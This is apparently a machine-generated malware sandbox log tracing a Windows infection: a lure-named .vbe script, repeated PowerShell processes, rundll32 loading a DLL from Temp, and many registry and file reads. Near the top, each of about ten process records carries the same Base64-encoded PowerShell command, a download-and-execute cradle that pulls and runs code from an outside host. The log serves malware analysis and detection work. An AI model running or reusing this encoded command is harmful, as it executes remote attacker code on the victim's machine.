"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
267
7964
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
268
6436
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
269
9276
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
270
9340
powershell.exe
3000
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
271
9428
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
272
9540
powershell.exe
5244
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
273
9572
powershell.exe
1304
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
274
9624
powershell.exe
3720
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
275
9692
powershell.exe
3908
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
276
10032
powershell.exe
3540
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
277
8252
rundll32.exe
3856
rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\5P5NRG~1\AppData\Local\Temp\vThQexNegi.dll,f0
C:\Windows\system32\
c:\windows\system32\rundll32.exe
Child_Of
Process
278
9396
rundll32.exe
8252
rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\5P5NRG~1\AppData\Local\Temp\vThQexNegi.dll,f0
C:\Windows\system32\
c:\windows\syswow64\rundll32.exe
File
STD_OUTPUT_HANDLE
File
users\5p5nrg~1\desktop\dokumentacja_92622.vbe
users\5p5nrg~1\desktop\dokumentacja_92622.vbe
c:\
c:\users\5p5nrg~1\desktop\dokumentacja_92622.vbe
vbe
WinRegistryKey
Software\Microsoft\Windows Script Host\Settings
HKEY_CURRENT_USER
Enabled
WinRegistryKey
Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE
IgnoreUserSettings
Enabled
WinRegistryKey
Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE
IgnoreUserSettings
TrustPolicy
UseWINSAFER
WinRegistryKey
Software\Microsoft\Windows Script Host\Settings
HKEY_CURRENT_USER
TrustPolicy
UseWINSAFER
WinRegistryKey
.vbe
HKEY_CLASSES_ROOT
WinRegistryKey
VBEFile\ScriptEngine
HKEY_CLASSES_ROOT
WinRegistryKey
Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE
IgnoreUserSettings
LogSecuritySuccesses
WinRegistryKey
Software\Microsoft\Windows Script Host\Settings
HKEY_CURRENT_USER
LogSecuritySuccesses
WinRegistryKey
Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE
Timeout
DisplayLogo
WinRegistryKey
Software\Microsoft\Windows Script Host\Settings
HKEY_CURRENT_USER
Timeout
DisplayLogo
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
